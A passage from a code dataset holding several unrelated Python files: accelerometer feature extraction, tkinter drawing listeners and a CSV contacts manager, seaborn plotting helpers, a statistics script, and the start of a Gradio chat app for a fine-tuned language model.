pd.tseries.frequencies.to_offset(\n \"2s\"\n ) # int(1 / (pd.tseries.frequencies.to_offset(self.frequency).nanos / 1000000000))\n\n df[\"x_acceleration_mean\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).mean()\n df[\"y_acceleration_mean\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).mean()\n df[\"z_acceleration_mean\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).mean()\n df[\"acceleration_average_mean\"] = df[\n [\"x_acceleration_mean\", \"y_acceleration_mean\", \"z_acceleration_mean\"]\n ].mean(axis=1)\n\n df[\"acceleration_vector_magnitude_mean\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).mean()\n )\n\n df[\"x_acceleration_sum\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).sum()\n df[\"y_acceleration_sum\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).sum()\n df[\"z_acceleration_sum\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).sum()\n df[\"acceleration_average_sum\"] = df[[\"x_acceleration_sum\", \"y_acceleration_sum\", \"z_acceleration_sum\"]].mean(\n axis=1\n )\n\n df[\"acceleration_vector_magnitude_sum\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).sum()\n )\n\n df[\"x_acceleration_min\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).min()\n df[\"y_acceleration_min\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).min()\n df[\"z_acceleration_min\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).min()\n df[\"acceleration_average_min\"] = df[[\"x_acceleration_min\", \"y_acceleration_min\", \"z_acceleration_min\"]].mean(\n axis=1\n )\n\n df[\"acceleration_vector_magnitude_min\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).min()\n )\n\n df[\"x_acceleration_max\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).max()\n df[\"y_acceleration_max\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).max()\n df[\"z_acceleration_max\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).max()\n df[\"acceleration_average_max\"] = df[[\"x_acceleration_max\", \"y_acceleration_max\", \"z_acceleration_max\"]].mean(\n axis=1\n )\n\n df[\"acceleration_vector_magnitude_max\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).max()\n )\n\n df[\"x_acceleration_stddev\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).std()\n df[\"y_acceleration_stddev\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).std()\n df[\"z_acceleration_stddev\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).std()\n df[\"acceleration_average_stddev\"] = df[\n [\"x_acceleration_stddev\", \"y_acceleration_stddev\", \"z_acceleration_stddev\"]\n ].mean(axis=1)\n\n df[\"acceleration_vector_magnitude_stddev\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).std()\n )\n\n df[\"x_acceleration_skew\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).skew()\n df[\"y_acceleration_skew\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).skew()\n df[\"z_acceleration_skew\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).skew()\n df[\"acceleration_average_skew\"] = df[\n [\"x_acceleration_skew\", \"y_acceleration_skew\", \"z_acceleration_skew\"]\n ].mean(axis=1)\n\n df[\"acceleration_vector_magnitude_skew\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).skew()\n )\n\n df[\"x_acceleration_variance\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).var()\n df[\"y_acceleration_variance\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).var()\n df[\"z_acceleration_variance\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).var()\n df[\"acceleration_average_variance\"] = df[\n [\"x_acceleration_variance\", \"y_acceleration_variance\", \"z_acceleration_variance\"]\n ].mean(axis=1)\n\n df[\"acceleration_vector_magnitude_variance\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).var()\n )\n\n df[\"x_acceleration_kurtosis\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).kurt()\n df[\"y_acceleration_kurtosis\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).kurt()\n df[\"z_acceleration_kurtosis\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).kurt()\n df[\"acceleration_average_kurtosis\"] = df[\n [\"x_acceleration_kurtosis\", \"y_acceleration_kurtosis\", \"z_acceleration_kurtosis\"]\n ].mean(axis=1)\n\n df[\"acceleration_vector_magnitude_kurtosis\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).kurt()\n )\n\n df[\"x_acceleration_energy\"] = df[\"x_acceleration_normalized\"].pow(2).rolling(window=window, center=True).mean()\n df[\"y_acceleration_energy\"] = df[\"y_acceleration_normalized\"].pow(2).rolling(window=window, center=True).mean()\n df[\"z_acceleration_energy\"] = df[\"z_acceleration_normalized\"].pow(2).rolling(window=window, center=True).mean()\n df[\"acceleration_average_energy\"] = df[\n [\"x_acceleration_energy\", \"y_acceleration_energy\", \"z_acceleration_energy\"]\n ].mean(axis=1)\n\n df[\"acceleration_vector_magnitude_energy\"] = (\n df[\"acceleration_vector_magnitude\"].pow(2).rolling(window=window, center=True).mean()\n )\n\n df[\"x_y_acceleration_correlation\"] = (\n df[\"x_acceleration_normalized\"].rolling(window=window).corr(df[\"y_acceleration_normalized\"])\n )\n df[\"x_z_acceleration_correlation\"] = (\n df[\"x_acceleration_normalized\"].rolling(window=window).corr(df[\"z_acceleration_normalized\"])\n )\n df[\"y_z_acceleration_correlation\"] = (\n df[\"y_acceleration_normalized\"].rolling(window=window).corr(df[\"z_acceleration_normalized\"])\n )\n df[\"x_acceleration_correlation_sum\"] = df[\"x_y_acceleration_correlation\"] + df[\"x_z_acceleration_correlation\"]\n df[\"y_acceleration_correlation_sum\"] = df[\"x_y_acceleration_correlation\"] + df[\"y_z_acceleration_correlation\"]\n df[\"z_acceleration_correlation_sum\"] = df[\"x_z_acceleration_correlation\"] + df[\"y_z_acceleration_correlation\"]\n\n if not inplace:\n return df\n","repo_name":"WildflowerSchools/wf-process-cuwb-data","sub_path":"process_cuwb_data/uwb_motion_features.py","file_name":"uwb_motion_features.py","file_ext":"py","file_size_in_byte":37150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17118138683","text":"from .click_listener import ClickListener\nfrom window.log_viewer import Logger\nfrom objects.point import Point\nfrom util.math_util import distanceSquared\nfrom factory.object_factory import ObjectType\n\nDISTANCE = 200\n\nclass PrePainter:\n\n def get_pre_object(self):\n pass\n\nclass SelectPointsListener(ClickListener, PrePainter):\n\n def __init__(self, objectType, callback):\n super().__init__()\n \n self.objectType = objectType\n self.callback = callback\n self.i = 0\n if self.objectType != ObjectType.WIREFRAME:\n Logger.log(\"Click on Canvas to define point[%i]\" % self.i)\n else:\n Logger.log(\"Click on Canvas to define point[%i], to finalize click again on the initial point\" % self.i)\n self.i += 1\n self.points: [Point] = []\n\n def onClick(self, x, y):\n if self.objectType != ObjectType.WIREFRAME:\n Logger.log(\"Canvas (x=%i, y=%i) selected\" % (x, y))\n self.points.append(Point(x, y))\n clicks = self.objectType.value\n if self.i < clicks or (self.objectType == ObjectType.WIREFRAME and (self.i <= 3 or distanceSquared(Point(x, y), self.points[0]) > DISTANCE)): \n if self.objectType == ObjectType.WIREFRAME:\n Logger.log(\"Canvas (x=%i, y=%i) selected\" % (x, y))\n self.points.append(Point(x, y))\n Logger.log(\"Click on Canvas to define point[%i]\" % self.i)\n self.i += 1\n else:\n self.callback(self.objectType, self.points)\n\n def get_pre_object(self):\n return self.points\n\nclass SelectCurvePointsListener(ClickListener, PrePainter):\n\n def __init__(self, callback):\n super().__init__()\n \n self.callback = callback\n Logger.log(\"Click on Canvas and Drag to define a bezier line, to finalize press Enter\")\n self.points = []\n self.current_point = Point(-1, -1)\n\n def onClick(self, x, y):\n self.current_point = Point(x, y)\n Logger.log(\"Canvas (x=%i, y=%i) selected\" % (x, y))\n\n def onRelease(self, x, y):\n if Point(x, y) == self.current_point:\n Logger.log(\"You must drag the mouse to get a bezier curve.\")\n return\n if len(self.points) % 4 == 0:\n self.points.append(self.current_point)\n self.points.append(Point(x, y))\n else:\n self.points.append(Point(x, y))\n self.points.append(self.current_point)\n self.current_point = Point(-1, -1)\n\n Logger.log(\"Release (x=%i, y=%i) selected\" % (x, y))\n if len(self.points) == 4:\n self.callback(ObjectType.CURVE2D, self.points)\n\n def finish(self):\n if len(self.points) < 4:\n Logger.log(\"You must define 2 lines at least\")\n return\n self.callback(ObjectType.CURVE2D, self.points)\n\n def get_pre_object(self):\n return self.points","repo_name":"flametuner/computational-graphics","sub_path":"src/listeners/create_listener.py","file_name":"create_listener.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21187896265","text":"import os\nfrom typing import List\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\n\nfrom src.utils.const import FIGURE_DIR\n\ncustom_params = {\n 'figure.figsize': (16, 8),\n 'lines.linewidth': 3,\n 'axes.titlesize': 20,\n 'axes.labelsize': 15,\n 'xtick.labelsize': 15,\n 'ytick.labelsize': 15\n}\n\n\n# sns.set_theme(rc=custom_params)\n# sns.set_palette('bright')\n\n\ndef show_class_distribution(df: pd.DataFrame):\n sns.set_theme(rc=custom_params)\n sns.set_palette('bright')\n distribution = (df.reset_index()\n .groupby('rating_discrete')\n .agg('count')\n .reset_index()\n .rename(columns={'index': 'count'}))\n\n # create pie chart\n plt.gca().axis(\"equal\")\n\n pie = plt.pie(distribution['count'], startangle=0, pctdistance=0.9, radius=1.2)\n\n plt.title('Class distribution train set', fontsize=24)\n\n # Defining intervals labels\n\n labels = [f'{round(i, 2)}-{round(i + 0.45, 2)}' for i in np.arange(0.5, 5, 0.45)]\n plt.legend(pie[0],\n labels,\n bbox_to_anchor=(0.75, 0.5),\n loc=\"center right\",\n fontsize=18,\n bbox_transform=plt.gcf().transFigure)\n plt.subplots_adjust(left=0.0, bottom=0.1, right=0.85)\n plt.show()\n plt.clf()\n plt.close()\n\n\ndef barplot_multiple_columns(groups: List, elements_group: List, data: List, title: str, yerr=None, filename: str = '',\n save: bool = False, label_count: bool = False, upper_title:bool=True) -> None:\n if yerr is None:\n yerr = []\n sns.set_theme(rc=custom_params)\n\n sns.set_palette('bright')\n fig, ax = plt.subplots(figsize=(16, 10))\n\n # X deve essere il range del numero di gruppi di grafico\n X = np.arange(len(groups))\n width = 0.1\n rs = [X]\n # deve scorrere il range del numero di barre che ci sono nel gruppo\n for idx in range(1, len(elements_group)):\n tmp = rs[idx - 1]\n rs.append(\n [val + width for val in tmp]\n )\n # va creata un'array che contiene un elemento per gruppo di grafico quindi in questo caso\n # l'elemento avrà cardinalità |len(df['model_name'].unique())|\n for idx, elm in enumerate(elements_group):\n # df[df['balance']==elm][scores].to_numpy().squeeze() = [f1_random, f1_decision, f1_gaussian, f1_quadratic]\n if yerr:\n ax.bar(x=rs[idx], height=data[idx], yerr=yerr[idx], label=elm, width=width)\n else:\n ax.bar(x=rs[idx], height=data[idx], label=elm, width=width)\n if label_count:\n ax.text(rs[idx], 1.05,\n data[idx],\n ha='center', va='bottom', rotation=90)\n\n ax.legend(fontsize=18, loc='lower left')\n loc_ticks = [(val + (len(elements_group) / 2) * width) - width / 2 for val in\n range(len(groups))]\n upper_labels = [val.upper() for val in groups]\n ax.set_title(title, fontsize=24)\n ax.set_xticks(loc_ticks)\n if upper_title:\n\n ax.set_xticklabels(upper_labels)\n else:\n ax.set_xticklabels(groups)\n\n if save:\n plt.savefig(filename)\n\n plt.show()\n\n\ndef histplot(x_values: pd.Series, title: str, xlabel: str, ylabel: str, filename: str = '', save: bool = False,\n **kwargs) -> None:\n sns.set_theme(rc=custom_params)\n sns.histplot(\n data=x_values,\n **kwargs\n ).set(xlabel=xlabel, ylabel=ylabel)\n plt.title(title)\n\n if save:\n filepath = os.path.join(FIGURE_DIR, filename)\n plt.savefig(filepath)\n\n plt.show()\n\n\ndef kdeplot(x_values: pd.Series, title: str, xlabel: str, ylabel: str, filename: str = '', save: bool = False,\n print_plot=True,\n **kwargs) -> None:\n sns.set_theme(rc=custom_params)\n sns.kdeplot(\n data=x_values,\n **kwargs\n ).set(xlabel=xlabel, ylabel=ylabel)\n plt.title(title)\n\n if save:\n plt.savefig(filename)\n if print_plot:\n plt.show()\n else:\n plt.close()\n","repo_name":"prushh/movie-lens-mlp","sub_path":"src/visualization/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2504275149","text":"import argparse\nimport csv\nfrom glob import glob\nimport re\nimport statistics\nimport sys\n\ndef get_stats_from(files_names, files_content):\n for i in range(len(files_content)):\n file_name = files_names[i]\n file_content = files_content[i]\n print(\"FILE : {0}\".format(files_names[i]))\n print(\"\\t*MEAN : {0}\".format(statistics.mean(file_content)))\n print(\"\\t*MEDIAN : {0}\".format(statistics.median(file_content)))\n print(\"\\t*MOST TYPICAL VALUE : {0}\".format(statistics.mode(file_content)))\n print(\"\\t*STANDARD DEVIATION : {0}\".format(statistics.stdev(file_content)))\n print(\"\\t*VARIANCE : {0}\".format(statistics.variance(file_content)))\n\ndef get_global_stats(files_content):\n data = []\n for sublist in files_content:\n data = data + sublist\n print(\"*GLOBAL MEAN : {0}\".format(statistics.mean(data)))\n print(\"*GLOBAL MEDIAN : {0}\".format(statistics.median(data)))\n print(\"*GLOBAL MOST TYPICAL VALUE : {0}\".format(statistics.mode(data)))\n print(\"*GLOBAL STANDARD DEVIATION : {0}\".format(statistics.stdev(data)))\n print(\"*GLOBAL VARIANCE : {0}\".format(statistics.variance(data)))\n\ndef main():\n parser = argparse.ArgumentParser(description='Get stats from Powertool output')\n parser.add_argument('-p', '--path', type=str, default=None, required=True,\n help=\"specify path to your directories\")\n parser.add_argument('-o', '--output', action=\"store_true\",\n help=\"save the output in the analysed directory\")\n args = parser.parse_args()\n\n directories = glob(args.path+\"*\")\n\n if len(directories) == 0:\n sys.exit(1)\n\n csv_files = []\n\n for directory in directories:\n current_files = [x for x in glob(directory + \"/*\") if \".csv\" in x]\n csv_files = csv_files + current_files\n\n files_content = []\n\n for csv_file in csv_files:\n with open(csv_file, \"r\") as csv_content:\n csv_reader = csv.reader(csv_content)\n files_content.append([float(row[0]) for row in csv_reader if not (re.match(\"^\\d+?\\.\\d+?$\", row[0]) is None)])\n\n get_stats_from(directories, files_content)\n\n get_global_stats(files_content)\n\nif __name__ == '__main__':\n main()\n","repo_name":"k0pernicus/fxos-powertool","sub_path":"get_stats_from.py","file_name":"get_stats_from.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"31311184027","text":"from tkinter import *\nimport csv\nfrom tkinter import messagebox as ms\nimport uuid\n\n\nglobal data\nglobal row\ndata = []\nwith open('ambot.csv', 'r') as rf:\n n = csv.reader(rf)\n for row in n:\n if row:\n data.append(row)\n\n\n# Main Class which consist of all operations and codes for the GUI\nclass main:\n def __init__(self, master):\n self.master = master\n self.fullname = StringVar()\n self.email = StringVar()\n self.number = StringVar()\n self.var = StringVar()\n self.optionList = [\"Mobile\", \"Work\", \"Home\"]\n\n self.n_fullName = StringVar()\n self.n_email = StringVar()\n self.n_number = StringVar()\n self.n_var = StringVar()\n self.n_mobile = StringVar()\n self.n_work = StringVar()\n self.n_home = StringVar()\n # Create Widgets\n self.widgets()\n\n # This Function is used to search and verify if a contact exists\n def search_contacts(self):\n mirror = bool\n fullname = self.n_fullName.get()\n for row in data:\n for field in row:\n if field == fullname:\n mirror = True\n print(row)\n print(data)\n # display fullname\n Label(self.find, text=' Full Name: ', font=('', 15), pady=5, padx=5, bg = 'yellow', fg= '#970af5').grid(row=4, column=0)\n name = Label(self.find, text=str(row[0]), font=('', 15), bg = 'yellow', fg= '#970af5')\n name.grid(row=4, column=1)\n Button(self.find, text='EDIT', bd=3, font=('', 10), padx=5, command=self.UpdateName).grid(row=4,\n column=2)\n\n # email\n Label(self.find, text=' E-MAIL: ', font=('', 15), pady=5, padx=5, bg = 'yellow', fg= '#970af5').grid(row=5, column=0)\n email = Label(self.find, text=row[1], font=('', 15), bg = 'yellow', fg= '#970af5')\n email.grid(row=5, column=1)\n Button(self.find, text='EDIT', bd=3, font=('', 10), padx=5, command=self.UpdatEmail).grid(row=5,\n column=2)\n\n # mobile\n Label(self.find, text='MOBILE NUMBER: ', font=('', 15), pady=5, padx=5, bg = 'yellow', fg= '#970af5').grid(row=6, column=0)\n mobile = Label(self.find, text=row[3], font=('', 15), bg = 'yellow', fg= '#970af5')\n mobile.grid(row=6, column=1)\n Button(self.find, text='EDIT', bd=3, font=('', 10), padx=5, command=self.UpdateMobile).grid(row=6,\n column=2)\n # work\n Label(self.find, text=' WORK NUMBER: ', font=('', 15), pady=5, padx=5, bg = 'yellow', fg= '#970af5').grid(row=7, column=0)\n work = Label(self.find, text=row[4], font=('', 15), bg = 'yellow', fg= '#970af5')\n work.grid(row=7, column=1)\n Button(self.find, text='EDIT', bd=3, font=('', 10), padx=5, command=self.UpdateWork).grid(row=7,\n column=2)\n\n # home\n Label(self.find, text=' HOME NUMBER: ', font=('', 15), pady=5, padx=5, bg = 'yellow', fg= '#970af5').grid(row=8, column=0)\n home = Label(self.find, text=row[5], font=('', 15), bg = 'yellow', fg= '#970af5')\n home.grid(row=8, column=1)\n Button(self.find, text='EDIT', bd=3, font=('', 10), padx=5, command=self.UpdateHome).grid(row=8,\n column=2)\n Button(self.find, text='UPDATE', bd=3, font=('', 15), padx=5, command=self.update_writer, bg = 'yellow', fg= '#970af5').grid(\n row=10, column=0)\n Button(self.find, text='DELETE', bd=3, font=('', 15), padx=5, command=self.Delete, bg = 'yellow', fg= '#970af5').grid(row=10,\n column=1)\n\n if mirror != True:\n ms.showerror('Error', 'Name not found!')\n\n # This Function is used Edit the Name of the contact\n def UpdateName(self):\n fullname = self.n_fullName.get()\n for row in data:\n for field in row:\n if field == fullname:\n Entry(self.find, textvariable=self.n_fullName, bd=5, font=('', 15)).grid(row=4, column=1)\n x = int()\n mirror = bool\n full_name = self.n_fullName.get()\n for row in data:\n for field in row:\n if field == self.fullname.get():\n mirror = True\n if mirror == True:\n ms.showerror('Oops!', 'A contact with the same name Already exists')\n else:\n while x != 1:\n for row in data:\n for field in row:\n if field == full_name:\n row[0] = full_name\n with open('ambot.csv', 'w') as wf:\n write_data = csv.writer(wf)\n for line in data:\n write_data.writerow(line)\n\n # This Function is used Edit the Name of the contact\n def UpdatEmail(self):\n fullname = self.n_fullName.get()\n for row in data:\n for field in row:\n if field == fullname:\n Entry(self.find, textvariable=self.n_email, bd=5, font=('', 15)).grid(row=5, column=1)\n x = int()\n full_name = self.n_fullName.get()\n email_info = self.n_email.get()\n while x != 1:\n for row in data:\n for field in row:\n if field == full_name:\n row[1] = email_info\n x = 1\n with open('ambot.csv', 'w') as wf:\n write_data = csv.writer(wf)\n for line in data:\n write_data.writerow(line)\n\n # This Function is used Edit the Name of the contact\n def UpdateMobile(self):\n fullname = self.n_fullName.get()\n for row in data:\n for field in row:\n if field == fullname:\n Entry(self.find, textvariable=self.n_mobile, bd=5, font=('', 15)).grid(row=6, column=1)\n x = int()\n full_name = self.n_fullName.get()\n mobile = self.n_mobile.get()\n while x != 1:\n for row in data:\n for field in row:\n if field == full_name:\n row[3] = mobile\n x = 1\n with open('ambot.csv', 'w') as wf:\n write_data = csv.writer(wf)\n for line in data:\n write_data.writerow(line)\n\n # This Function is used Edit the Name of the contact\n def UpdateWork(self):\n fullname = self.n_fullName.get()\n for row in data:\n for field in row:\n if field == fullname:\n Entry(self.find, textvariable=self.n_work, bd=5, font=('', 15)).grid(row=7, column=1)\n\n x = int()\n full_name = self.n_fullName.get()\n work = self.n_work.get()\n while x != 1:\n for row in data:\n for field in row:\n if field == full_name:\n row[4] = work\n x = 1\n with open('ambot.csv', 'w') as wf:\n write_data = csv.writer(wf)\n for line in data:\n write_data.writerow(line)\n\n # This Function is used Edit the Name of the contact\n def UpdateHome(self):\n fullname = self.n_fullName.get()\n for row in data:\n for field in row:\n if field == fullname:\n Entry(self.find, textvariable=self.n_home, bd=5, font=('', 15)).grid(row=8, column=1)\n x = int()\n full_name = self.n_fullName.get()\n home = self.n_home.get()\n while x != 1:\n for row in data:\n for field in row:\n if field == full_name:\n row[5] = home\n x = 1\n with open('ambot.csv', 'w') as wf:\n write_data = csv.writer(wf)\n for line in data:\n write_data.writerow(line)\n\n # This Function is used to write the manipulated database list to an external database\n def update_writer(self):\n ms.showinfo('Success!', 'Contact Updated')\n with open('ambot.csv', 'w') as wf:\n write_data = csv.writer(wf)\n for line in data:\n write_data.writerow(line)\n root.destroy()\n\n print(data)\n\n # This Function is used to Delete a certain contact\n def Delete(self):\n full_name = self.n_fullName.get()\n for row in data:\n for field in row:\n if full_name == field:\n data.remove(row)\n with open('ambot.csv', 'w') as wf:\n write_data = csv.writer(wf)\n for line in data:\n write_data.writerow(line)\n print(data)\n ms.showinfo('Success!', 'Contact Deleted')\n with open('ambot.csv', 'w') as wf:\n write_data = csv.writer(wf)\n for line in data:\n write_data.writerow(line)\n root.destroy()\n\n # This Function is used to add Contacts and to append a certain data to the global variable\n def add_contacts(self):\n print(data)\n mobile = str()\n work = str()\n home = str()\n mirror = bool\n fullname = self.fullname.get()\n for row in data:\n for field in row:\n if field == self.fullname.get():\n mirror = True\n if mirror == True:\n ms.showerror('Oops!', 'A contact with the same name Already exists')\n else:\n email = self.email.get()\n type = self.var.get()\n id = uuid.uuid4()\n print(type)\n if type == 'Mobile':\n mobile = self.number.get()\n print(mobile)\n work = 'None'\n home = 'None'\n elif type == 'Work':\n work = self.number.get()\n print(work)\n mobile = 'None'\n home = 'None'\n elif type == 'Home':\n home = self.number.get()\n print(home)\n mobile = 'None'\n work = 'None'\n with open('ambot.csv', 'a') as rf:\n fieldnames = ['FULL_NAME', 'EMAIL', 'ID', 'MOBILE', 'WORK', 'HOME']\n n = csv.DictWriter(rf, fieldnames=fieldnames)\n n.writerow(\n {'FULL_NAME': fullname, 'EMAIL': email, 'ID': id, 'MOBILE': mobile, 'WORK': work, 'HOME': home, })\n \n\n ms.showinfo('Success!', 'Contact Added')\n root.destroy()\n\n # This Functions are used to setup the Packing methods of the widgets for the GUI\n def main(self):\n self.n_fullName.set('')\n self.n_email.set('')\n self.create.pack_forget()\n self.head['text'] = 'Select Your Choice'\n self.home.pack()\n\n def add(self):\n self.n_fullName.set('')\n self.n_email.set('')\n self.home.pack_forget()\n self.head['text'] = 'ADD NEW CONTACT'\n self.create.pack()\n\n def search(self):\n self.n_fullName.set('')\n self.n_email.set('')\n self.home.pack_forget()\n self.create.pack_forget()\n self.find.pack_forget()\n self.head['text'] = 'SEARCH CONTACT'\n self.find.pack()\n\n # This is used to setup the interface\n def widgets(self):\n # entry part\n self.head = Label(self.master, text=\"\\n \\n Huawei Numbawan \\n \\n\", font=('', 24), fg= '#970af5')\n self.head.configure(background = 'Yellow') \n self.head.pack()\n Label(self.master, text=\"\", bg = '#970af5').pack()\n\n ##------- HOME --------##\n self.home = Frame(self.master, padx=10, pady=1, bg = '#970af5')\n # buttons part\n Button(self.home, text='\\n Search Contacts \\n', bd=3,fg = '#970af5', bg = 'Light Pink', font=('', 14), padx=5, pady=5, command=self.search).pack()\n Label(self.home, text=\"\", bg = '#970af5').pack()\n Button(self.home, text='\\n Add Contacts \\n', bd=3,fg = '#970af5', bg = 'Light Pink', font=('', 14), padx=5, pady=5, command=self.add).pack()\n Label(self.home, text=\"\", bg = '#970af5').pack()\n self.home.pack()\n ##------- ADD CONTACTS --------##\n self.create = Frame(self.master, padx=10, pady=10, bg = '#970af5')\n Label(self.create, text=' Enter Full Name:\\n', font=('', 15), pady=0, padx=0, bg= 'Yellow', fg = '#970af5').grid(sticky=W, row=2, column=0)\n Entry(self.create, textvariable=self.fullname, bd=5, font=('', 15)).grid(row=2, column=1)\n\n Label(self.create, text=' Enter E-mail Address:\\n', font=('', 15), pady=0, padx=0, bg= 'Yellow', fg = '#970af5').grid(sticky=W)\n Entry(self.create, textvariable=self.email, bd=5, font=('', 15)).grid(row=3, column=1)\n\n Label(self.create, text=' Enter Number:\\n', font=('', 15), pady=0, padx=0, bg= 'Yellow', fg = '#970af5').grid(sticky=W)\n Label(self.create, text='Type:', font=('', 15), pady=5, padx=5, bg= 'Yellow', fg = '#970af5').grid(row=4,column = 2)\n OptionMenu(self.create, self.var, *self.optionList).grid(row=4, columnspan=2, column = 3)\n Entry(self.create, textvariable=self.number, bd=5, font=('', 15)).grid(row=4, column=1)\n\n Label(self.create, text='', bg='#970af5').grid(sticky=W)\n\n Button(self.create, text='Add Contact', bg= 'Yellow', fg = '#970af5', bd=3, font=('', 15), padx=5, pady=5, command=self.add_contacts).grid(\n row=8, columnspan=4)\n ##------- SEARCH --------##\n self.find = Frame(self.master, padx=10, pady=10, bg = '#970af5')\n Label(self.find, text=' Enter Full Name: ', font=('', 15), pady=5, padx=5, bg= 'Yellow', fg = '#970af5').grid(sticky=W, row=2, column=0)\n Entry(self.find, textvariable=self.n_fullName, bd=5, font=('', 15)).grid(row=2, column=1)\n Button(self.find, text='Search', bg= 'Yellow', fg = '#970af5', bd=3, font=('', 15), padx=0, pady=0, command=self.search_contacts).grid(\n column=2, row=2)\n\n\n# Runs the GUI\nroot = Tk()\nroot.configure(bg= '#970af5')\nmain(root)\nroot.title(\"Phone\")\nroot.mainloop()","repo_name":"kyle1200434/DatabaseGUI","sub_path":"kyleGUI.py","file_name":"kyleGUI.py","file_ext":"py","file_size_in_byte":15875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29364223894","text":"import gradio as gr\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, pipeline, StoppingCriteria, StoppingCriteriaList, TextIteratorStreamer\nfrom huggingface_hub import HfFolder\nimport time\nimport numpy as np\nfrom torch.nn import functional as F\nimport os\nfrom threading import Thread\nfrom context_builder import build_user_context\n\nfrom peft import (\n LoraConfig,\n get_peft_model,\n prepare_model_for_int8_training,\n TaskType,\n PeftConfig,\n PeftModel\n)\n\n\nprint(f\"Starting to load the model to memory\")\n\n\nUSER_TOKEN = '<|USER|>'\nASSISTANT_TOKEN = '<|ASSISTANT|>'\n\nHfFolder.save_token(os.getenv(\"HF_TOKEN\"))\npeft_model_id = \"rjac/temp_modelv3\"\nconfig = PeftConfig.from_pretrained(peft_model_id)\n# Custom One\ntokenizer = AutoTokenizer.from_pretrained(peft_model_id,use_auth_token=True)\n# tokenizer = AutoTokenizer.from_pretrained(config.base_model_name_or_path)\nlanguage_model = AutoModelForCausalLM.from_pretrained(\n config.base_model_name_or_path,\n load_in_8bit=True,\n device_map='auto',\n torch_dtype=torch.float16,\n)\n\nlanguage_model = PeftModel.from_pretrained(language_model, peft_model_id)\n\nprint(f\"Sucessfully loaded the model to the memory\")\n\nstart_message = \"\"\"<|SYSTEM|># Nutrition Assistant: Answer questions related to Senza nutrition app, using the context provided within triple backticks.\\nIf a question is unrelated to the app, respond: I am sorry, I\\'m afraid I cannot answer that question.\\n```\\n{}\\n```\\n\"\"\"\n\nclass StopOnTokens(StoppingCriteria):\n def __call__(self, input_ids: torch.LongTensor, scores: torch.FloatTensor, **kwargs) -> bool:\n #stop_ids = [50278, 50279, 50277, 1, 0] # TODO: Verify what tokens are this\n stop_ids = [535, 50277, 50278, 50279, 1, 0]\n #stop_ids = [1, 0]\n for stop_id in stop_ids:\n if input_ids[0][-1] == stop_id:\n return True\n return False\n\ndef user(message, history):\n # Append the user's message to the conversation history\n # return \"\", history + [[message, \"\"]]\n # return \"\", history[-1:] + [[message, \"\"]]\n return \"\", [[message, \"\"]]\n\n\ndef chat(curr_system_message, history):\n # Initialize a StopOnTokens object\n stop = StopOnTokens()\n\n system_message = start_message.format(curr_system_message)\n # Construct the input message string for the model by concatenating the current system message and conversation history\n messages = system_message + \\\n \"\".join([\"\".join([USER_TOKEN+item[0], ASSISTANT_TOKEN+item[1]]) for item in history])\n print(messages)\n # Tokenize the messages string\n model_inputs = tokenizer([messages], return_tensors=\"pt\").to(\"cuda\")\n streamer = TextIteratorStreamer(tokenizer, timeout=30., skip_prompt=True, skip_special_tokens=True)\n generate_kwargs = dict(\n model_inputs,\n streamer=streamer,\n max_new_tokens=350,\n do_sample=True,\n top_p=0.95,\n top_k=1000,\n temperature=1.00,\n num_beams=1,\n stopping_criteria=StoppingCriteriaList([stop])\n )\n t = Thread(target=language_model.generate, kwargs=generate_kwargs)\n t.start()\n\n # print(history)\n # Initialize an empty string to store the generated text\n partial_text = \"\"\n for new_text in streamer:\n # print(new_text)\n partial_text += new_text\n history[-1][1] = partial_text\n # Yield an empty string to cleanup the message textbox and the updated conversation history\n yield history\n return partial_text\n\n\ndef user_context(user_id):\n user_info = build_user_context(user_id)\n return user_info\n\nwith gr.Blocks() as demo:\n # history = gr.State([])\n gr.Markdown(\"## StableLM-Senza-alpha-7b Chat\")\n\n with gr.Row():\n\n user_id_holder = gr.Textbox(\n label=\"User ID\",\n placeholder=\"####\",\n show_label=True\n ).style(container=False) \n\n 